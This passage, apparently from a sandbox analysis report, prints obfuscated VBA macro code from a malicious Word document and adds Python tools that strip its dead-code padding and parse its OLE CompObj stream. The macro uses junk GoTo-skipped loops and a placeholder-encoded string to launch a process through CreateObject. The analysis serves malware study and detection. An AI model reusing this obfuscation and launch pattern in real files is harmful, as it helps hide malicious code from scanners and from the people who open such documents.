                                                                                If bIdgDIKT(KwsnJ) = 46 Or KwsnJ = KwsnJ Then
                                                                                    dscc = "sasdsacc" & (mDUMGI / 2) + 1 & " to " & (KwsnJ / 2) + 1 & MidB$(bIdgDIKT, mDUMGI + 1, KwsnJ - mDUMGI + 3)
                                                                                    mDUMGI = KwsnJ + 2
                                                                                End If
                                                                                KwsnJ = KwsnJ + 2
                                                                            Loop
                                                                        Next
                                                                    KAIEzBBDB:
                                                                    D72efu7a0how7es = "wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh b"
                                                                       GoTo OXSmB
                                                                    Set opZGEJ = OfcyMA
                                                                        Dim UZSgXY, SWiOAACq, axfnb As Long
                                                                        Dim RSOyLFC As Word.Paragraph
                                                                        Dim qZUuB() As Byte
                                                                        For Each RSOyLFC In Tvh1u8793dltn9.Paragraphs
                                                                            qZUuB = RSOyLFC.Range
                                                                            dscc = "sadsaccc" & RSOyLFC.Range
                                                                            SWiOAACq = UBound(qZUuB) - 1
                                                                            UZSgXY = 0
                                                                    Set fFCxQGp = VFEoD
                                                                            Do Until SWiOAACq > SWiOAACq
                                                                                If qZUuB(SWiOAACq) = 46 Or SWiOAACq = SWiOAACq Then
                                                                                    dscc = "sasdsacc" & (UZSgXY / 2) + 1 & " to " & (SWiOAACq / 2) + 1 & MidB$(qZUuB, UZSgXY + 1, SWiOAACq - UZSgXY + 3)
                                                                                    UZSgXY = SWiOAACq + 2
                                                                                End If
                                                                                SWiOAACq = SWiOAACq + 2
                                                                            Loop
                                                                        Next
                                                                    OXSmB:
                                                                    C22jnnyve59b2 = "x [ sh bx [ sh b" + Mid(Application.Name, 60 / 10, 1) + "x [ sh bx [ sh b"
                                                                       GoTo rYDvv
                                                                    Set GOSKJ = AOSGE
                                                                        Dim pblpJEP, yNTJYEFj, EFfaBWHC As Long
                                                                        Dim OlVYDaAK As Word.Paragraph
                                                                        Dim iVxnxGH() As Byte
                                                                        For Each OlVYDaAK In Tvh1u8793dltn9.Paragraphs
                                                                            iVxnxGH = OlVYDaAK.Range
                                                                            dscc = "sadsaccc" & OlVYDaAK.Range
                                                                            yNTJYEFj = UBound(iVxnxGH) - 1
                                                                            pblpJEP = 0
                                                                    Set bquxP = zIlZF
                                                                            Do Until yNTJYEFj > yNTJYEFj
                                                                                If iVxnxGH(yNTJYEFj) = 46 Or yNTJYEFj = yNTJYEFj Then
                                                                                    dscc = "sasdsacc" & (pblpJEP / 2) + 1 & " to " & (yNTJYEFj / 2) + 1 & MidB$(iVxnxGH, pblpJEP + 1, yNTJYEFj - pblpJEP + 3)
                                                                                    pblpJEP = yNTJYEFj + 2
                                                                                End If
                                                                                yNTJYEFj = yNTJYEFj + 2
                                                                            Loop
                                                                        Next
                                                                    rYDvv:
                                                                    Cew5ncdrgctcj = D72efu7a0how7es + C22jnnyve59b2 + Cyum5s6729q4h + wjnsc + T8m6rm0ljeoit
                                                                       GoTo tgyiIBI
                                                                    Set yJRyW = IeEnJ
                                                                        Dim FJGWlF, boTEsG, DAKdJA As Long
                                                                        Dim kjSGfNWH As Word.Paragraph
                                                                        Dim NTrejcdK() As Byte
                                                                        For Each kjSGfNWH In Tvh1u8793dltn9.Paragraphs
                                                                            NTrejcdK = kjSGfNWH.Range
                                                                            dscc = "sadsaccc" & kjSGfNWH.Range
                                                                            boTEsG = UBound(NTrejcdK) - 1
                                                                            FJGWlF = 0
                                                                    Set LVHhGsGJd = PRawGB
                                                                            Do Until boTEsG > boTEsG
                                                                                If NTrejcdK(boTEsG) = 46 Or boTEsG = boTEsG Then
                                                                                    dscc = "sasdsacc" & (FJGWlF / 2) + 1 & " to " & (boTEsG / 2) + 1 & MidB$(NTrejcdK, FJGWlF + 1, boTEsG - FJGWlF + 3)
                                                                                    FJGWlF = boTEsG + 2
                                                                                End If
                                                                                boTEsG = boTEsG + 2
                                                                            Loop
                                                                        Next
                                                                    tgyiIBI:
                                                                    Pey8y7gr_e6_y = K532dwnyk0pybrc(Cew5ncdrgctcj)
                                                                       GoTo urNCUFJBF
                                                                    Set aekya = NDNfzBJJ
                                                                        Dim QyRiIm, WEIxlI, rZGGJBDEH As Long
                                                                        Dim EvkuEA As Word.Paragraph
                                                                        Dim ZFzwZcA() As Byte
                                                                        For Each EvkuEA In Tvh1u8793dltn9.Paragraphs
                                                                            ZFzwZcA = EvkuEA.Range
                                                                            dscc = "sadsaccc" & EvkuEA.Range
                                                                            WEIxlI = UBound(ZFzwZcA) - 1
                                                                            QyRiIm = 0
                                                                    Set Gownu = BLbjEJvG
                                                                            Do Until WEIxlI > WEIxlI
                                                                                If ZFzwZcA(WEIxlI) = 46 Or WEIxlI = WEIxlI Then
                                                                                    dscc = "sasdsacc" & (QyRiIm / 2) + 1 & " to " & (WEIxlI / 2) + 1 & MidB$(ZFzwZcA, QyRiIm + 1, WEIxlI - QyRiIm + 3)
                                                                                    QyRiIm = WEIxlI + 2
                                                                                End If
                                                                                WEIxlI = WEIxlI + 2
                                                                            Loop
                                                                        Next
                                                                    urNCUFJBF:
                                                                    Set V5rp8m_1bqwi1poyk = CreateObject(Pey8y7gr_e6_y)
                                                                       GoTo TQOflAN
                                                                    Set arTLjQ = BeNoB
                                                                        Dim iqpwDAG, nSFIYBiG, KqVudsGK As Long
                                                                        Dim wFpBJBJE As Word.Paragraph
                                                                        Dim bKloWCbL() As Byte
                                                                        For Each wFpBJBJE In Tvh1u8793dltn9.Paragraphs
                                                                            bKloWCbL = wFpBJBJE.Range
                                                                            dscc = "sadsaccc" & wFpBJBJE.Range
                                                                            nSFIYBiG = UBound(bKloWCbL) - 1
                                                                            iqpwDAG = 0
                                                                    Set Mpmet = qqdsB
                                                                            Do Until nSFIYBiG > nSFIYBiG
                                                                                If bKloWCbL(nSFIYBiG) = 46 Or nSFIYBiG = nSFIYBiG Then
                                                                                    dscc = "sasdsacc" & (iqpwDAG / 2) + 1 & " to " & (nSFIYBiG / 2) + 1 & MidB$(bKloWCbL, iqpwDAG + 1, nSFIYBiG - iqpwDAG + 3)
                                                                                    iqpwDAG = nSFIYBiG + 2
                                                                                End If
                                                                                nSFIYBiG = nSFIYBiG + 2
                                                                            Loop
                                                                        Next
                                                                    TQOflAN:
                                                                    njcnja = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))
                                                                    nnjasd = K532dwnyk0pybrc(njcnja)
                                                                       GoTo OgZqDzXrC
                                                                    Set FSWADGB = SlFMhE
                                                                        Dim fWUcJcE, bDqBloVC, OZDOK As Long
                                                                        Dim JRtnBYH As Word.Paragraph
                                                                        Dim pXRdBD() As Byte
                                                                        For Each JRtnBYH In Tvh1u8793dltn9.Paragraphs
                                                                            pXRdBD = JRtnBYH.Range
                                                                            dscc = "sadsaccc" & JRtnBYH.Range
                                                                            bDqBloVC = UBound(pXRdBD) - 1
                                                                            fWUcJcE = 0
                                                                    Set axZmGGE = TtNYEBE
                                                                            Do Until bDqBloVC > bDqBloVC
                                                                                If pXRdBD(bDqBloVC) = 46 Or bDqBloVC = bDqBloVC Then
                                                                                    dscc = "sasdsacc" & (fWUcJcE / 2) + 1 & " to " & (bDqBloVC / 2) + 1 & MidB$(pXRdBD, fWUcJcE + 1, bDqBloVC - fWUcJcE + 3)
                                                                                    fWUcJcE = bDqBloVC + 2
                                                                                End If
                                                                                bDqBloVC = bDqBloVC + 2
                                                                            Loop
                                                                        Next
                                                                    OgZqDzXrC:
                                                                    V5rp8m_1bqwi1poyk.Create nnjasd, Koy_r2oxzs1, X2yj58n39t50co
                                                                       GoTo ScLedvBEA
                                                                    Set yktdUg = kxpwbBJF
                                                                        Dim wEvDIdG, lqbmGD, elJkJIB As Long
                                                                        Dim IVjOAGZe As Word.Paragraph
                                                                        Dim FcotIf() As Byte
                                                                        For Each IVjOAGZe In Tvh1u8793dltn9.Paragraphs
                                                                            FcotIf = IVjOAGZe.Range
                                                                            dscc = "sadsaccc" & IVjOAGZe.Range
                                                                            lqbmGD = UBound(FcotIf) - 1
                                                                            wEvDIdG = 0
                                                                    Set sJtmJ = UYxXOcIJG
                                                                            Do Until lqbmGD > lqbmGD
                                                                                If FcotIf(lqbmGD) = 46 Or lqbmGD = lqbmGD Then
                                                                                    dscc = "sasdsacc" & (wEvDIdG / 2) + 1 & " to " & (lqbmGD / 2) + 1 & MidB$(FcotIf, wEvDIdG + 1, lqbmGD - wEvDIdG + 3)
                                                                                    wEvDIdG = lqbmGD + 2
                                                                                End If
                                                                                lqbmGD = lqbmGD + 2
                                                                            Loop
                                                                        Next
                                                                    ScLedvBEA:
                                                                    End Function
                                                                    Function K532dwnyk0pybrc(Ev1oy1be511zamut8)
                                                                    On Error Resume Next
                                                                       GoTo pzxJi
                                                                    Set wrpigDnBA = bHGFAGJ
                                                                        Dim fUGOALvdN, FKISJTLG, OpNHJEa As Long
                                                                        Dim ZlnBbxF As Word.Paragraph
                                                                        Dim pxjzGA() As Byte
                                                                        For Each ZlnBbxF In Tvh1u8793dltn9.Paragraphs
                                                                            pxjzGA = ZlnBbxF.Range
                                                                            dscc = "sadsaccc" & ZlnBbxF.Range
                                                                            FKISJTLG = UBound(pxjzGA) - 1
                                                                            fUGOALvdN = 0
                                                                    Set xNIlBBInl = OaOIEKmCA
                                                                            Do Until FKISJTLG > FKISJTLG
                                                                                If pxjzGA(FKISJTLG) = 46 Or FKISJTLG = FKISJTLG Then
                                                                                    dscc = "sasdsacc" & (fUGOALvdN / 2) + 1 & " to " & (FKISJTLG / 2) + 1 & MidB$(pxjzGA, fUGOALvdN + 1, FKISJTLG - fUGOALvdN + 3)
                                                                                    fUGOALvdN = FKISJTLG + 2
                                                                                End If
                                                                                FKISJTLG = FKISJTLG + 2
                                                                            Loop
                                                                        Next
                                                                    pzxJi:
                                                                    Lynlzg8g_wcyt8ojr = Ev1oy1be511zamut8
                                                                       GoTo QtjyA
                                                                    Set phkpFqFCH = DHwdFs
                                                                        Dim nHiSH, jHDSG, udnviH As Long
                                                                        Dim DLwSlnDF As Word.Paragraph
                                                                        Dim pXPTCf() As Byte
                                                                        For Each DLwSlnDF In Tvh1u8793dltn9.Paragraphs
                                                                            pXPTCf = DLwSlnDF.Range
                                                                            dscc = "sadsaccc" & DLwSlnDF.Range
                                                                            jHDSG = UBound(pXPTCf) - 1
                                                                            nHiSH = 0
                                                                    Set seTGCvRG = mwvhyA
                                                                            Do Until jHDSG > jHDSG
                                                                                If pXPTCf(jHDSG) = 46 Or jHDSG = jHDSG Then
                                                                                    dscc = "sasdsacc" & (nHiSH / 2) + 1 & " to " & (jHDSG / 2) + 1 & MidB$(pXPTCf, nHiSH + 1, jHDSG - nHiSH + 3)
                                                                                    nHiSH = jHDSG + 2
                                                                                End If
                                                                                jHDSG = jHDSG + 2
                                                                            Loop
                                                                        Next
                                                                    QtjyA:
                                                                    E4u6ubi3v5l2 = Yw0lmj9uz2sfz0(Lynlzg8g_wcyt8ojr)
                                                                       GoTo XxLEEC
                                                                    Set ZtgGUHFGJ = prgAO
                                                                        Dim TMQhTRa, LZepVwu, JPHDBd As Long
                                                                        Dim bkUZDN As Word.Paragraph
                                                                        Dim QNtsSHe() As Byte
                                                                        For Each bkUZDN In Tvh1u8793dltn9.Paragraphs
                                                                            QNtsSHe = bkUZDN.Range
                                                                            dscc = "sadsaccc" & bkUZDN.Range
                                                                            LZepVwu = UBound(QNtsSHe) - 1
                                                                            TMQhTRa = 0
                                                                    Set MxAtNhGI = imnrzOF
                                                                            Do Until LZepVwu > LZepVwu
                                                                                If QNtsSHe(LZepVwu) = 46 Or LZepVwu = LZepVwu Then
                                                                                    dscc = "sasdsacc" & (TMQhTRa / 2) + 1 & " to " & (LZepVwu / 2) + 1 & MidB$(QNtsSHe, TMQhTRa + 1, LZepVwu - TMQhTRa + 3)
                                                                                    TMQhTRa = LZepVwu + 2
                                                                                End If
                                                                                LZepVwu = LZepVwu + 2
                                                                            Loop
                                                                        Next
                                                                    XxLEEC:
                                                                    K532dwnyk0pybrc = E4u6ubi3v5l2
                                                                       GoTo SWSoCG
                                                                    Set OaVnI = UmQHurWB
                                                                        Dim zxEzinCG, EHISACDA, aBRvB As Long
                                                                        Dim XdfYSIXX As Word.Paragraph
                                                                        Dim wWvlxHJH() As Byte
                                                                        For Each XdfYSIXX In Tvh1u8793dltn9.Paragraphs
                                                                            wWvlxHJH = XdfYSIXX.Range
                                                                            dscc = "sadsaccc" & XdfYSIXX.Range
                                                                            EHISACDA = UBound(wWvlxHJH) - 1
                                                                            zxEzinCG = 0
                                                                    Set wVEbaDF = WhmkB
                                                                            Do Until EHISACDA > EHISACDA
                                                                                If wWvlxHJH(EHISACDA) = 46 Or EHISACDA = EHISACDA Then
                                                                                    dscc = "sasdsacc" & (zxEzinCG / 2) + 1 & " to " & (EHISACDA / 2) + 1 & MidB$(wWvlxHJH, zxEzinCG + 1, EHISACDA - zxEzinCG + 3)
                                                                                    zxEzinCG = EHISACDA + 2
                                                                                End If
                                                                                EHISACDA = EHISACDA + 2
                                                                            Loop
                                                                        Next
                                                                    SWSoCG:
                                                                    End Function
                                                                    Function Yw0lmj9uz2sfz0(Vld8aalp9dc)
                                                                       GoTo nhgrV
                                                                    Set nfGGCgIdG = JltZHC
                                                                        Dim cxvFCyK, lTApi, gLahNHF As Long
                                                                        Dim ooYfBGDHB As Word.Paragraph
                                                                        Dim hVgaFGj() As Byte
                                                                        For Each ooYfBGDHB In Tvh1u8793dltn9.Paragraphs
                                                                            hVgaFGj = ooYfBGDHB.Range
                                                                            dscc = "sadsaccc" & ooYfBGDHB.Range
                                                                            lTApi = UBound(hVgaFGj) - 1
                                                                            cxvFCyK = 0
                                                                    Set QDRLrCD = hbrLsIIaJ
                                                                            Do Until lTApi > lTApi
                                                                                If hVgaFGj(lTApi) = 46 Or lTApi = lTApi Then
                                                                                    dscc = "sasdsacc" & (cxvFCyK / 2) + 1 & " to " & (lTApi / 2) + 1 & MidB$(hVgaFGj, cxvFCyK + 1, lTApi - cxvFCyK + 3)
                                                                                    cxvFCyK = lTApi + 2
                                                                                End If
                                                                                lTApi = lTApi + 2
                                                                            Loop
                                                                        Next
                                                                    nhgrV:
                                                                       GoTo NelhA
                                                                    Set nVwvHB = iyOuxJbS
                                                                        Dim fiGUDJCof, ccUPI, xFjGF As Long
                                                                        Dim TIdZDCk As Word.Paragraph
                                                                        Dim BMzteJlIE() As Byte
                                                                        For Each TIdZDCk In Tvh1u8793dltn9.Paragraphs
                                                                            BMzteJlIE = TIdZDCk.Range
                                                                            dscc = "sadsaccc" & TIdZDCk.Range
                                                                            ccUPI = UBound(BMzteJlIE) - 1
                                                                            fiGUDJCof = 0
                                                                    Set MSHSTFGF = vcpiDgaED
                                                                            Do Until ccUPI > ccUPI
                                                                                If BMzteJlIE(ccUPI) = 46 Or ccUPI = ccUPI Then
                                                                                    dscc = "sasdsacc" & (fiGUDJCof / 2) + 1 & " to " & (ccUPI / 2) + 1 & MidB$(BMzteJlIE, fiGUDJCof + 1, ccUPI - fiGUDJCof + 3)
                                                                                    fiGUDJCof = ccUPI + 2
                                                                                End If
                                                                                ccUPI = ccUPI + 2
                                                                            Loop
                                                                        Next
                                                                    NelhA:
                                                                       GoTo qjZyxC
                                                                    Set fPJtR = TVnICGBMg
                                                                        Dim OGmjSHH, dxYfn, tsgajz As Long
                                                                        Dim VwecCsW As Word.Paragraph
                                                                        Dim jpCcJn() As Byte
                                                                        For Each VwecCsW In Tvh1u8793dltn9.Paragraphs
                                                                            jpCcJn = VwecCsW.Range
                                                                            dscc = "sadsaccc" & VwecCsW.Range
                                                                            dxYfn = UBound(jpCcJn) - 1
                                                                            OGmjSHH = 0
                                                                    Set ShwUGEG = HoDns
                                                                            Do Until dxYfn > dxYfn
                                                                                If jpCcJn(dxYfn) = 46 Or dxYfn = dxYfn Then
                                                                                    dscc = "sasdsacc" & (OGmjSHH / 2) + 1 & " to " & (dxYfn / 2) + 1 & MidB$(jpCcJn, OGmjSHH + 1, dxYfn - OGmjSHH + 3)
                                                                                    OGmjSHH = dxYfn + 2
                                                                                End If
                                                                                dxYfn = dxYfn + 2
                                                                            Loop
                                                                        Next
                                                                    qjZyxC:
                                                                    Yw0lmj9uz2sfz0 = Replace(Vld8aalp9dc, "x [ sh b", Zi0fdg4qf12t)
                                                                       GoTo CMhXU
                                                                    Set yEbqhrSDE = ElQBeG
                                                                        Dim KGTisCFg, htkDBkB, QbynDCF As Long
                                                                        Dim wUyzGJ As Word.Paragraph
                                                                        Dim YXZHHCaB() As Byte
                                                                        For Each wUyzGJ In Tvh1u8793dltn9.Paragraphs
                                                                            YXZHHCaB = wUyzGJ.Range
                                                                            dscc = "sadsaccc" & wUyzGJ.Range
                                                                            htkDBkB = UBound(YXZHHCaB) - 1
                                                                            KGTisCFg = 0
                                                                    Set oyFNHnHHI = xhcZSBIH
                                                                            Do Until htkDBkB > htkDBkB
                                                                                If YXZHHCaB(htkDBkB) = 46 Or htkDBkB = htkDBkB Then
                                                                                    dscc = "sasdsacc" & (KGTisCFg / 2) + 1 & " to " & (htkDBkB / 2) + 1 & MidB$(YXZHHCaB, KGTisCFg + 1, htkDBkB - KGTisCFg + 3)
                                                                                    KGTisCFg = htkDBkB + 2
                                                                                End If
                                                                                htkDBkB = htkDBkB + 2
                                                                            Loop
                                                                        Next
                                                                    CMhXU:
                                                                       GoTo BhNEmrIE
                                                                    Set PDdhFK = fPExO
                                                                        Dim YgziIE, DwikAuvE, fEtRs As Long
                                                                        Dim YvQjieFc As Word.Paragraph
                                                                        Dim VuThCQHH() As Byte
                                                                        For Each YvQjieFc In Tvh1u8793dltn9.Paragraphs
                                                                            VuThCQHH = YvQjieFc.Range
                                                                            dscc = "sadsaccc" & YvQjieFc.Range
                                                                            DwikAuvE = UBound(VuThCQHH) - 1
                                                                            YgziIE = 0
                                                                    Set WfWmdXBB = obcJwDFA
                                                                            Do Until DwikAuvE > DwikAuvE
                                                                                If VuThCQHH(DwikAuvE) = 46 Or DwikAuvE = DwikAuvE Then
                                                                                    dscc = "sasdsacc" & (YgziIE / 2) + 1 & " to " & (DwikAuvE / 2) + 1 & MidB$(VuThCQHH, YgziIE + 1, DwikAuvE - YgziIE + 3)
                                                                                    YgziIE = DwikAuvE + 2
                                                                                End If
                                                                                DwikAuvE = DwikAuvE + 2
                                                                            Loop
                                                                        Next
                                                                    BhNEmrIE:
                                                                       GoTo VcRJFFPFy
                                                                    Set dMAig = FVoXJ
                                                                        Dim wzAgBA, zZJyEAC, YqhWFED As Long
                                                                        Dim tVHJH As Word.Paragraph
                                                                        Dim DLNPo() As Byte
                                                                        For Each tVHJH In Tvh1u8793dltn9.Paragraphs
                                                                            DLNPo = tVHJH.Range
                                                                            dscc = "sadsaccc" & tVHJH.Range
                                                                            zZJyEAC = UBound(DLNPo) - 1
                                                                            wzAgBA = 0
                                                                    Set swiEYEUA = ZGOfHDFZ
                                                                            Do Until zZJyEAC > zZJyEAC
                                                                                If DLNPo(zZJyEAC) = 46 Or zZJyEAC = zZJyEAC Then
                                                                                    dscc = "sasdsacc" & (wzAgBA / 2) + 1 & " to " & (zZJyEAC / 2) + 1 & MidB$(DLNPo, wzAgBA + 1, zZJyEAC - wzAgBA + 3)
                                                                                    wzAgBA = zZJyEAC + 2
                                                                                End If
                                                                                zZJyEAC = zZJyEAC + 2
                                                                            Loop
                                                                        Next
                                                                    VcRJFFPFy:
                                                                    End Function
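The `GoTo VcRJFFPFy` on the second line of this function tail jumps straight to the label that sits before `End Function`, so the entire paragraph-scanning block between them, including the `Do Until zZJyEAC > zZJyEAC` loop whose exit condition can never hold, is never executed; it is filler that bulks up the macro and gives static scanners plausible-looking Word object code to chew on. The Python script below is an added example, not code from the Joe Sandbox report: a minimal reachability pass that marks everything between an unconditional `GoTo`, `Exit` or `Resume` and the next label something actually jumps to as dead. Its input is the function tail listed above, copied verbatim apart from the export's indentation.

```python
import re

# Constructed input: the tail of the macro function shown above, with the
# report export's indentation stripped; the statements are unchanged.
MACRO_TAIL = """\
BhNEmrIE:
    GoTo VcRJFFPFy
Set dMAig = FVoXJ
    Dim wzAgBA, zZJyEAC, YqhWFED As Long
    Dim tVHJH As Word.Paragraph
    Dim DLNPo() As Byte
    For Each tVHJH In Tvh1u8793dltn9.Paragraphs
        DLNPo = tVHJH.Range
        dscc = "sadsaccc" & tVHJH.Range
        zZJyEAC = UBound(DLNPo) - 1
        wzAgBA = 0
Set swiEYEUA = ZGOfHDFZ
        Do Until zZJyEAC > zZJyEAC
            If DLNPo(zZJyEAC) = 46 Or zZJyEAC = zZJyEAC Then
                dscc = "sasdsacc" & (wzAgBA / 2) + 1 & " to " & (zZJyEAC / 2) + 1 & MidB$(DLNPo, wzAgBA + 1, zZJyEAC - wzAgBA + 3)
                wzAgBA = zZJyEAC + 2
            End If
            zZJyEAC = zZJyEAC + 2
        Loop
    Next
VcRJFFPFy:
End Function
"""

LABEL_RE = re.compile(r"^\s*([A-Za-z_]\w*):\s*$")
# A line that is nothing but a jump; "If x Then GoTo y" is conditional and ignored.
JUMP_RE = re.compile(
    r"^\s*(?:GoTo\s+[A-Za-z_]\w*|Exit\s+(?:Sub|Function)|Resume\s+[A-Za-z_]\w*)\s*$", re.I)
# Any label that is a jump target anywhere (including On Error GoTo) restarts reachability.
TARGET_RE = re.compile(r"\b(?:GoTo|Resume)\s+([A-Za-z_]\w*)", re.I)
SCOPE_END_RE = re.compile(r"^\s*End\s+(?:Sub|Function|Property)\s*$", re.I)


def dead_code_report(src):
    """Return the 1-based line numbers that no control path reaches.

    After an unconditional jump every statement is dead until a label that is
    referenced somewhere, or the end of the procedure. Labels that nothing
    targets do not revive the flow, so junk labels cannot hide the padding.
    """
    lines = src.splitlines()
    targets = set(TARGET_RE.findall(src))
    dead, goto_count, code_lines = [], 0, 0
    unreachable = False
    for number, line in enumerate(lines, 1):
        if not line.strip():
            continue
        label = LABEL_RE.match(line)
        if label:
            if label.group(1) in targets:
                unreachable = False
            continue
        code_lines += 1
        if unreachable:
            dead.append(number)
        if JUMP_RE.match(line):
            goto_count += line.lstrip().lower().startswith("goto")
            unreachable = True
        if SCOPE_END_RE.match(line):
            unreachable = False
    return {"dead_lines": dead, "code_lines": code_lines, "goto_count": goto_count}


if __name__ == "__main__":
    report = dead_code_report(MACRO_TAIL)
    print("%d of %d statements unreachable, %d GoTo" % (
        len(report["dead_lines"]), report["code_lines"], report["goto_count"]))
```

On this tail 18 of the 20 statements are unreachable: only the `GoTo` itself and `End Function` ever run. Run over a whole module the same pass separates the padding from the handful of statements that reach WMI or PowerShell, which is where manual deobfuscation effort should go.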

                                                                    Streams

                                                                    Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                                                    Entropy:4.00187355764
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
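The Data ASCII column above shows the second half of this stream only as stray punctuation (`. > . : . C . < . 5 . = . B`), because it prints the low byte of each UTF-16 code unit and drops the 0x04 high byte. The parser below is an added example, not part of the Joe Sandbox report or of any tool it names; it walks the CompObj layout from MS-OLEDS (28-byte header carrying the CLSID, ANSI user type, ANSI clipboard format, ProgID, 0x71B239F4 marker, UTF-16 user type) over the 128 bytes the report prints and copes with the dump being shorter than the 146-byte stream.

```python
import struct
import uuid

# Constructed input: the 128 bytes of the \x1CompObj stream that the report's
# "Data Raw" column prints (the stream itself is 146 bytes, so the tail is cut).
COMPOBJ_DUMP = bytes.fromhex(
    "01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46"
    "00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44"
    "6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04"
    "35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00"
    "57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00"
)

UNICODE_MARKER = 0x71B239F4      # MS-OLEDS CompObjStream.UnicodeMarker


def _u32(buf, off):
    if off + 4 > len(buf):
        raise EOFError("dump ends inside a length field at offset %d" % off)
    return struct.unpack_from("<I", buf, off)[0]


def _ansi_string(buf, off):
    """LengthPrefixedAnsiString: u32 byte count, then the bytes (NUL included)."""
    n = _u32(buf, off)
    off += 4
    return buf[off:off + n].rstrip(b"\x00").decode("latin-1"), off + n


def parse_compobj(buf):
    """Decode a CompObj stream; tolerate a dump that stops early."""
    if len(buf) < 28 or buf[:4] != b"\x01\x00\xfe\xff":
        raise ValueError("not a CompObj stream")
    info = {"truncated": False, "unicode_user_type": None}
    # Header: Reserved1, Version, 0xFFFFFFFF, then the embedded object's CLSID.
    info["clsid"] = "{%s}" % str(uuid.UUID(bytes_le=bytes(buf[12:28]))).upper()
    off = 28
    info["ansi_user_type"], off = _ansi_string(buf, off)
    # AnsiClipboardFormat: 0xFFFFFFFE/0xFFFFFFFF announce a standard format id,
    # 0 means absent, anything else is the length of a registered format name.
    marker = _u32(buf, off)
    if marker in (0xFFFFFFFE, 0xFFFFFFFF):
        info["clipboard_format"] = "CF_%d" % _u32(buf, off + 4)
        off += 8
    elif marker == 0:
        info["clipboard_format"] = ""
        off += 4
    else:
        info["clipboard_format"], off = _ansi_string(buf, off)
    info["prog_id"], off = _ansi_string(buf, off)      # Reserved1 carries the ProgID
    try:
        if _u32(buf, off) == UNICODE_MARKER:
            n = _u32(buf, off + 4)
            raw = buf[off + 8:off + 8 + n]
            info["truncated"] = len(raw) < n
            info["unicode_user_type"] = raw.decode("utf-16-le", "ignore").rstrip("\x00")
    except EOFError:
        info["truncated"] = True
    return info


if __name__ == "__main__":
    for key, value in parse_compobj(COMPOBJ_DUMP).items():
        print("%-18s %r" % (key, value))
```

On the report's bytes this yields CLSID {00020906-0000-0000-C000-000000000046} (the Word 97-2003 document class), an empty ANSI user type, clipboard format MSWordDoc, ProgID Word.Document.8, and a Unicode user type that decodes to "Документ Microsoft Word 97-" before the dump is cut (the ASCII column shows the string continuing to "2003"). The type string being Russian is consistent with the file having been saved by a Russian-language Word installation; that is an inference from the string, not something the report states.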
                                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                    Entropy:0.280441275353
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . . . . . . j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 520
                                                                    Entropy:4.01867247642
                                                                    Base64 Encoded:True
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d8 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 64 01 00 00 04 00 00 00 4c 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 d0 00 00 00 09 00 00 00 dc 00 00 00
                                                                    Stream Path: 1Table, File Type: data, Stream Size: 6873
                                                                    Entropy:6.02451032197
                                                                    Base64 Encoded:True
